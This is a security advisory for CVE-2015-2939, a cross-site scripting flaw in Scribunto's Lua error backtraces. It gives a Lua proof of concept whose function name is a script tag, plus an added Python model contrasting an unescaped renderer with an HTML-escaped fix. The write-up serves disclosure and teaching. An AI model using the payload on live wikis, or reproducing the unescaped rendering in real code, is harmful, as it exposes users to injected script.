Function names in Scribunto's Lua error backtraces are displayed to the user without being sanitized, allowing XSS attacks. Proof-of-concept:
local p = {}
-- The table key is the attacker-chosen function name that later appears verbatim in the backtrace
p['<script>alert("XSS")</script>'] = function() error('CLICK ME') end
function p.main(frame)
    p['<script>alert("XSS")</script>']()
end
return p
If a user clicks on the error message generated by invoking p.main() in order to view the backtrace, the script will run.
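Added example, not Scribunto's own code: a small Python model of the defect and its fix. It parses a constructed Lua-style traceback of the kind the PoC produces (the module name and layout are assumptions) and renders it to HTML twice, once interpolating the function name verbatim as the vulnerable code did, and once HTML-escaping it.

```python
import html
import re

# Constructed sample traceback; the module name is an assumption. The function name on the
# second frame is the attacker-controlled table key from the proof-of-concept above.
SAMPLE_TRACEBACK = (
    "Module:Example:3: CLICK ME\n"
    "stack traceback:\n"
    "\t[C]: in function 'error'\n"
    "\tModule:Example:3: in function '<script>alert(\"XSS\")</script>'\n"
    "\tModule:Example:5: in function 'main'\n"
)

# Lua 5.1 traceback frame: "\t<location>: in function '<name>'" or "in main chunk" / "in ?"
FRAME_RE = re.compile(
    r"^\t(?P<where>.+?): in (?:function '(?P<name>.*)'|(?P<other>main chunk|\?|function <.*>))$"
)


def parse_frames(traceback):
    """Return (location, function_name_or_None) for each stack frame line."""
    frames = []
    for line in traceback.splitlines():
        m = FRAME_RE.match(line)
        if m:
            frames.append((m.group("where"), m.group("name")))
    return frames


def render_backtrace_unsafe(traceback):
    """Vulnerable rendering: the function name reaches the HTML unescaped."""
    items = []
    for where, name in parse_frames(traceback):
        label = f"in function '{name}'" if name is not None else "in main chunk"
        items.append(f"<li>{html.escape(where)}: {label}</li>")
    return "<ul>" + "".join(items) + "</ul>"


def render_backtrace_safe(traceback):
    """Hardened rendering: every string taken from the Lua error is HTML-escaped."""
    items = []
    for where, name in parse_frames(traceback):
        label = (f"in function '{html.escape(name)}'"
                 if name is not None else "in main chunk")
        items.append(f"<li>{html.escape(where)}: {label}</li>")
    return "<ul>" + "".join(items) + "</ul>"
```

The safe renderer turns the payload into `&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;`, so the browser shows the name as text instead of executing it.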
Patch:
- 1.24:
- 1.23:
Affected Versions: (needed)
Type: xss
CVE: CVE-2015-2939